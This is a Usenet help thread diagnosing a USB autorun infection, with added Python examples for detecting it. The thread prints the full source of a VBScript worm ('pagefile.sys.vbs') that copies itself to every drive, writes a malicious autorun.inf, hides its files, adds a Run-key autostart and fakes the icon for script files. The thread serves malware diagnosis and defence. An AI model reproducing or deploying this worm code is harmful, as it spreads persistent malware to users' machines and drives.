Do you see any Autorun.inf file on this Volume ?
It can be Hidden and System, see Folder Options.
Or in a Console (Start>Run>cmd) :
attrib -h -s -r F:\autorun.inf
(assuming your external drive is F)
Rename Autorun.inf to Autorun.txt and copy the text here.
Thanks.
Example of a bad Autorun.inf ==>
[AutoRun]
open=xn1i9x.com
shell\open\Command=xn1i9x.com
shell\explore\Command=xn1i9x.com
More information :
http://www.google.com/search?q=xn1i9x.com
Protections :
Tell the system to not read Autorun.inf
http://www.google.com/search?q=IniFileMapping+Autorun.inf
Avoid using a PC with administrator privileges.
So autorun.inf is ignored.
Check every drive for viruses and so on.
To protect a volume, you can create a FOLDER named autorun.inf
Make it Hidden, System and ReadOnly :
F:
attrib +h +s +r autorun.inf
Then it will be difficult to write a new FILE with that name.
--
Regards, Jean-François
"JF" <JF@-> wrote in message news:uUVc8XaA...@TK2MSFTNGP05.phx.gbl...
> Thanks, but there is no autorun.inf file
Start>Run>regsvr32 /i shell32
Check these (by default) Values which must be equal to "none"
HKCR\Directory\shell (by default)=none
HKCR\Drive\shell (by default)=none
--
Regards, Jean-François
Found it.
This is what it says in notepad:
[autorun]
shellexecute=wscript.exe pagefile.sys.vbs
"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...
> Thanks,
> Found it.
> This is what it says in notepad:
> [autorun]
> shellexecute=wscript.exe pagefile.sys.vbs
Very well, thank you for the feed-back.
Wscript.exe is a command to execute .VBS scripts
c:\PageFile.sys is your paging file.
But pagefile.sys.vbs is a script which attempts to be seen as a legal
system file (ask for every extension in Folder Options).
Did you find this pagefile.sys.vbs somewhere on your drives ?
It should be on F:\ or C:\ or
c:\windows or
c:\windows\system32
A script is some text.
You can rename it as pagefile.sys.vbs.txt
And copy here the text. Thanks !
--
Regards, Jean-François
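A way to triage the two autorun.inf files quoted in this thread, as an added example that is not part of the original posts: it parses the [autorun] section and reports every entry that starts a program, plus the script-host and double-extension signs discussed above. The function names, the list of extensions and the benign sample are assumptions made for the illustration.

```python
import re

# Constructed samples: the first two reproduce the autorun.inf contents quoted
# in this thread; the third is a harmless file made up for comparison.
SAMPLES = {
    "xn1i9x": r"""[AutoRun]
open=xn1i9x.com
shell\open\Command=xn1i9x.com
shell\explore\Command=xn1i9x.com
""",
    "pagefile": "[autorun]\nshellexecute=wscript.exe pagefile.sys.vbs\n",
    "benign": "[autorun]\nicon=setup.ico\nlabel=Backup disk\n",
}

SCRIPT_HOSTS = {"wscript", "cscript"}          # Windows Script Host front ends
DOUBLE_EXT = re.compile(r"\.\w{2,4}\.(vbs|vbe|js|jse|wsf|exe|com|bat|cmd|scr|pif)\b", re.I)

def parse_autorun(text):
    """Return {lower-cased key: value} from the [autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def triage(text):
    """List (key, reason) pairs for entries that start a program from the volume."""
    findings = []
    for key, value in parse_autorun(text).items():
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key not in ("open", "shellexecute") and not is_verb:
            continue                            # icon=, label= etc. launch nothing
        findings.append((key, "launches " + value))
        program = value.split()[0].lower() if value else ""
        if program.endswith(".exe"):
            program = program[:-4]
        if program in SCRIPT_HOSTS:
            findings.append((key, "runs a script through " + program))
        if DOUBLE_EXT.search(value):
            findings.append((key, "double extension hides the real file type"))
    return findings

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, triage(text))
```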
'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...
1. C:\pagefile.sys.vbs
2. C:\pagefile.sys
"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...
> Sorry, forgot to mention that I found these two files:
> 1. C:\pagefile.sys.vbs
> 2. C:\pagefile.sys
Thank you, this is very interesting.
1 = malware
http://www.google.com/search?q=pagefile.sys.vbs
2 = legal system file
For your information my anti-virus screamed
and your message appears now (for me) with this title :
Sujet : [avast! - INFECTED] Re: Unable to double click on external
Drive
I cannot find for now which instruction alerts Avast.
Somebody knows ?
Question :
Do you have any anti-virus ?
http://www.google.com/search?q=Avast!+VS+Antivir
--
Regards, Jean-François
> Sujet : [avast! - INFECTED] Re: Unable to double click on external Drive
> I cannot find for now which instruction alerts Avast.
This part of code is the cause of the alert :
rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbsANTIVIRUSALERT"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
I added ANTIVIRUSALERT to be quiet with Avast.
winpath represents the Windows folder.
The key Run\MSRegInfo does not exist normally, and is created by the
script. So it is a good idea to google it
http://www.google.com/search?q=Run%5CMSRegInfo
These are the 2 commands together which wake up Avast
... Run\MSRegInfo",winpath&"\pagefile.sys. vbs"
... rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
This second command gives a false icon to the VBS files so they are seen
as innocent text files.
--
Regards, Jean-François
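A static check for the two registry writes discussed above, as an added example that is not part of the original posts and does not claim to reproduce Avast's own logic: it extracts RegWrite targets from script text, labels autostart (Run key) entries and file-type icon changes, and reports whether both occur in the same script. The function names, labels and the third sample line are assumptions made for the illustration.

```python
import re

# Constructed sample: the two registry writes quoted in this thread, including
# the line break after "regwrite", followed by one unrelated write.
SAMPLE = r'''rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
sh.regwrite "HKCU\Software\ExampleApp\LastRun","today"
'''

# .RegWrite "<key>", <value> ; \s* lets the key sit on the following line.
REGWRITE = re.compile(r'\.regwrite\s*"([^"]+)"\s*,\s*([^\r\n]+)', re.I)
RUN_KEY = re.compile(r'^(HKEY_LOCAL_MACHINE|HKLM|HKEY_CURRENT_USER|HKCU)'
                     r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\(.+)$', re.I)
ICON_KEY = re.compile(r'^(HKEY_CLASSES_ROOT|HKCR)\\([^\\]+)\\DefaultIcon\\?$', re.I)

def registry_indicators(script_text):
    """Return (kind, name, value) for each suspicious RegWrite target found."""
    hits = []
    for key, value in REGWRITE.findall(script_text):
        run, icon = RUN_KEY.match(key), ICON_KEY.match(key)
        if run:
            # name = the value created under Run, i.e. what to look for in regedit
            hits.append(("autostart", run.group(3), value.strip()))
        elif icon:
            # name = the file class whose icon is replaced (vbsfile in this thread)
            hits.append(("icon-change", icon.group(2), value.strip()))
    return hits

def both_together(script_text):
    """True when a script both adds an autostart entry and changes a file icon."""
    kinds = {kind for kind, _, _ in registry_indicators(script_text)}
    return {"autostart", "icon-change"} <= kinds

if __name__ == "__main__":
    for hit in registry_indicators(SAMPLE):
        print(hit)
    print("both indicators present:", both_together(SAMPLE))
```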
Could be as simple as a bad mouse.
"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...
>>>> Do you see any Autorun.inf file on this Volume ?
>>>> It can be Hidden and System, see Folder Options.
>>> Thanks, but there is no autorun.inf file
>> Start>Run>regsvr32 /i shell32
>> Check these (by default) Values which must be equal to "none"
>> HKCR\Directory\shell (by default)=none
>> HKCR\Drive\shell (by default)=none
> Thanks,
> I now am able to double click.
> Good work!
Thank you again for the feed-back.
Bonne continuation !
--
Regards, Jean-François